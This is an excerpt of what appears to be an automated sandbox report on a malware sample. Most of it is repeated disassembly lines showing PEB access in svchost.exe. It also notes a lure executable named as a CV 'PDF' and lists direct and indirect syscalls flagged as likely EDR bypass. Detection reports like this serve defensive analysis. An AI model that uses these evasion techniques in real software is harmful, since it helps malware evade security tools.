            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A470 mov eax, dword ptr fs:[00000030h]3_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A470 mov eax, dword ptr fs:[00000030h]3_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A470 mov eax, dword ptr fs:[00000030h]3_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E443 mov eax, dword ptr fs:[00000030h]3_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEA456 mov eax, dword ptr fs:[00000030h]3_2_03AEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2645D mov eax, dword ptr fs:[00000030h]3_2_03A2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5245A mov eax, dword ptr fs:[00000030h]3_2_03A5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40BBE mov eax, dword ptr fs:[00000030h]3_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40BBE mov eax, dword ptr fs:[00000030h]3_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]3_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]3_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38BF0 mov eax, dword ptr fs:[00000030h]3_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38BF0 mov eax, dword ptr fs:[00000030h]3_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38BF0 mov eax, dword ptr fs:[00000030h]3_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5EBFC mov eax, dword ptr fs:[00000030h]3_2_03A5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]3_2_03ABCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A50BCB mov eax, dword ptr fs:[00000030h]3_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A50BCB mov eax, dword ptr fs:[00000030h]3_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A50BCB mov eax, dword ptr fs:[00000030h]3_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30BCD mov eax, dword ptr fs:[00000030h]3_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30BCD mov eax, dword ptr fs:[00000030h]3_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30BCD mov eax, dword ptr fs:[00000030h]3_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]3_2_03ADEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5EB20 mov eax, dword ptr fs:[00000030h]3_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5EB20 mov eax, dword ptr fs:[00000030h]3_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8B28 mov eax, dword ptr fs:[00000030h]3_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8B28 mov eax, dword ptr fs:[00000030h]3_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04B00 mov eax, dword ptr fs:[00000030h]3_2_03B04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAEB1D mov eax, dword ptr fs:[00000030h]3_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2CB7E mov eax, dword ptr fs:[00000030h]3_2_03A2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE4B4B mov eax, dword ptr fs:[00000030h]3_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE4B4B mov eax, dword ptr fs:[00000030h]3_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B02B57 mov eax, dword ptr fs:[00000030h]3_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B02B57 mov eax, dword ptr fs:[00000030h]3_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B02B57 mov eax, dword ptr fs:[00000030h]3_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B02B57 mov eax, dword ptr fs:[00000030h]3_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC6B40 mov eax, dword ptr fs:[00000030h]3_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC6B40 mov eax, dword ptr fs:[00000030h]3_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFAB40 mov eax, dword ptr fs:[00000030h]3_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD8B42 mov eax, dword ptr fs:[00000030h]3_2_03AD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A28B50 mov eax, dword ptr fs:[00000030h]3_2_03A28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADEB50 mov eax, dword ptr fs:[00000030h]3_2_03ADEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38AA0 mov eax, dword ptr fs:[00000030h]3_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38AA0 mov eax, dword ptr fs:[00000030h]3_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A86AA4 mov eax, dword ptr fs:[00000030h]3_2_03A86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA80 mov eax, dword ptr fs:[00000030h]3_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04A80 mov eax, dword ptr fs:[00000030h]3_2_03B04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A68A90 mov edx, dword ptr fs:[00000030h]3_2_03A68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6AAEE mov eax, dword ptr fs:[00000030h]3_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6AAEE mov eax, dword ptr fs:[00000030h]3_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A86ACC mov eax, dword ptr fs:[00000030h]3_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A86ACC mov eax, dword ptr fs:[00000030h]3_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A86ACC mov eax, dword ptr fs:[00000030h]3_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30AD0 mov eax, dword ptr fs:[00000030h]3_2_03A30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A64AD0 mov eax, dword ptr fs:[00000030h]3_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A64AD0 mov eax, dword ptr fs:[00000030h]3_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6CA24 mov eax, dword ptr fs:[00000030h]3_2_03A6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5EA2E mov eax, dword ptr fs:[00000030h]3_2_03A5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54A35 mov eax, dword ptr fs:[00000030h]3_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54A35 mov eax, dword ptr fs:[00000030h]3_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6CA38 mov eax, dword ptr fs:[00000030h]3_2_03A6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABCA11 mov eax, dword ptr fs:[00000030h]3_2_03ABCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6CA6F mov eax, dword ptr fs:[00000030h]3_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6CA6F mov eax, dword ptr fs:[00000030h]3_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6CA6F mov eax, dword ptr fs:[00000030h]3_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADEA60 mov eax, dword ptr fs:[00000030h]3_2_03ADEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AACA72 mov eax, dword ptr fs:[00000030h]3_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AACA72 mov eax, dword ptr fs:[00000030h]3_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36A50 mov eax, dword ptr fs:[00000030h]3_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36A50 mov eax, dword ptr fs:[00000030h]3_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36A50 mov eax, dword ptr fs:[00000030h]3_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36A50 mov eax, dword ptr fs:[00000030h]3_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36A50 mov eax, dword ptr fs:[00000030h]3_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36A50 mov eax, dword ptr fs:[00000030h]3_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36A50 mov eax, dword ptr fs:[00000030h]3_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40A5B mov eax, dword ptr fs:[00000030h]3_2_03A40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40A5B mov eax, dword ptr fs:[00000030h]3_2_03A40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A0 mov eax, dword ptr fs:[00000030h]3_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A309AD mov eax, dword ptr fs:[00000030h]3_2_03A309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A309AD mov eax, dword ptr fs:[00000030h]3_2_03A309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB89B3 mov esi, dword ptr fs:[00000030h]3_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB89B3 mov eax, dword ptr fs:[00000030h]3_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB89B3 mov eax, dword ptr fs:[00000030h]3_2_03AB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]3_2_03ABE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A629F9 mov eax, dword ptr fs:[00000030h]3_2_03A629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A629F9 mov eax, dword ptr fs:[00000030h]3_2_03A629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC69C0 mov eax, dword ptr fs:[00000030h]3_2_03AC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03A3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A649D0 mov eax, dword ptr fs:[00000030h]3_2_03A649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]3_2_03AFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB892A mov eax, dword ptr fs:[00000030h]3_2_03AB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC892B mov eax, dword ptr fs:[00000030h]3_2_03AC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE908 mov eax, dword ptr fs:[00000030h]3_2_03AAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE908 mov eax, dword ptr fs:[00000030h]3_2_03AAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC912 mov eax, dword ptr fs:[00000030h]3_2_03ABC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A28918 mov eax, dword ptr fs:[00000030h]3_2_03A28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A28918 mov eax, dword ptr fs:[00000030h]3_2_03A28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A56962 mov eax, dword ptr fs:[00000030h]3_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A56962 mov eax, dword ptr fs:[00000030h]3_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A56962 mov eax, dword ptr fs:[00000030h]3_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7096E mov eax, dword ptr fs:[00000030h]3_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7096E mov edx, dword ptr fs:[00000030h]3_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7096E mov eax, dword ptr fs:[00000030h]3_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD4978 mov eax, dword ptr fs:[00000030h]3_2_03AD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD4978 mov eax, dword ptr fs:[00000030h]3_2_03AD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC97C mov eax, dword ptr fs:[00000030h]3_2_03ABC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB0946 mov eax, dword ptr fs:[00000030h]3_2_03AB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04940 mov eax, dword ptr fs:[00000030h]3_2_03B04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30887 mov eax, dword ptr fs:[00000030h]3_2_03A30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC89D mov eax, dword ptr fs:[00000030h]3_2_03ABC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]3_2_03AFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03A6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03A6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]3_2_03A5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B008C0 mov eax, dword ptr fs:[00000030h]3_2_03B008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52835 mov eax, dword ptr fs:[00000030h]3_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52835 mov eax, dword ptr fs:[00000030h]3_2_03A52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52835 mov eax, dword ptr fs:[00000030h]3_2_03A52835
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtCreateFile: Direct from: 0x77752FEC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtOpenFile: Direct from: 0x77752DCC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtSetInformationThread: Direct from: 0x77752ECC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtQueryInformationToken: Direct from: 0x77752CAC
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtTerminateThread: Direct from: 0x77752FCC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtProtectVirtualMemory: Direct from: 0x77752F9C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtSetInformationProcess: Direct from: 0x77752C5C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtNotifyChangeKey: Direct from: 0x77753C2C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtOpenKeyEx: Direct from: 0x77752B9C
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtOpenSection: Direct from: 0x77752E0C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtTerminateThread: Direct from: 0x77747B2E
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtAllocateVirtualMemory: Direct from: 0x777548EC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtQuerySystemInformation: Direct from: 0x777548CC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtAllocateVirtualMemory: Direct from: 0x77752BEC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtDeviceIoControlFile: Direct from: 0x77752AEC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtCreateUserProcess: Direct from: 0x7775371C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtWriteVirtualMemory: Direct from: 0x7775490C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtQueryInformationProcess: Direct from: 0x77752C26
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtResumeThread: Direct from: 0x77752FBC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtReadVirtualMemory: Direct from: 0x77752E8C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtCreateKey: Direct from: 0x77752C6C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtSetInformationThread: Direct from: 0x77752B4C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtQueryAttributesFile: Direct from: 0x77752E6C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtAllocateVirtualMemory: Direct from: 0x77753C9C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtClose: Direct from: 0x77752B6C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtCreateMutant: Direct from: 0x777535CC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtWriteVirtualMemory: Direct from: 0x77752E3C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtMapViewOfSection: Direct from: 0x77752D1C
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtResumeThread: Direct from: 0x777536AC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtReadFile: Direct from: 0x77752ADC
